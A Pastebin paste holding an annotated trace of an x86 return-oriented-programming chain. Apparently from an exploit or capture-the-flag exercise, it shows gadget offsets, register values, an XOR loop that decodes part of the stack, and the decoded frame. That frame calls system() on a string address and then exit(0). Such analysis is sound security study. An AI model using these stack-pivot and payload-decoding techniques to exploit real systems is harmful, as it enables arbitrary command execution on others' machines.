SHARE
TWEET

Untitled

a guest Jun 20th, 2019 40 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. 0   [ST] *POP EBP*            | EBP=01010101
  2. 4   [79] POP ESI              | ESI=FFFFFFF6
  3. 12  [7F] POP EBX              | EBX=FFFFFFFF
  4. 20  [B7] NOT EBX              | EBX=00000000
  5. 24  [A0] NEG ESI              | ESI=0000000A
  6. 28  [81] ADD EBX,ESP          | EBX=&BASE[32]
  7. 32  [84] ADD EBX,20           | EBX=&BASE[52]
  8. 36  [84] ADD EBX,20           | EBX=&BASE[72]
  9. 40  [84] ADD EBX,20           | EBX=&BASE[92]
  10. 44  [AA] MOV DPTR [EBX-4],ESP | BASE[88] = &BASE[48]
  11. 48  [88] MOV EAX, DPTR [EBX]  | EAX = [EBX]                
  12. 52  [9B] XOR EAX, EBP         | EAX ^= 01010101
  13. 56  [A3] MOV DPTR [EBX], EAX  | [EBX] = EAX
  14. 60  [7B] ADD EBX,4            | EBX += 4
  15. 64  [98] XOR EAX,EAX          | EAX = 0
  16. 68  [8D] SUB ESI, 1           | ESI -= 1
  17. 72  [A6] RCR EAX, 28          | RCR(EAX, 28)  # eax = esi < 0 ? 16 : 0
  18. 76  [C0] NO-OP (ret gadget)   |
  19. 80  [AE] ADD ESP,EAX          | ESP += EAX    # if eax == 16 then next esp is 84+16=100
  20. 84  [9E] POP ESP              | ESP = BASE[88]
  21.  
  22.  
  23. for (i in 92..132 step 4) {
  24.     stack[dword i] ^= 01010101
  25. }
  26.  
  27. memory after xor:
  28.  
  29. C0 85 04 08 C0 85 04 08 C0 85 04 08
  30. D0 EC E5 F7
  31. C0 1E E5 F7
  32. 38 A0 04 08
  33. 00 00 00 00
  34.  
  35. 92  [C0] NO-OP (ret gadget)
  36. 96  [C0] NO-OP (ret gadget)
  37. 100 [C0] NO-OP (ret gadget)
  38. 104 &system
  39. 108 &exit
  40. 112 system arg: 0804A038
  41. 116 exit arg: 0
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top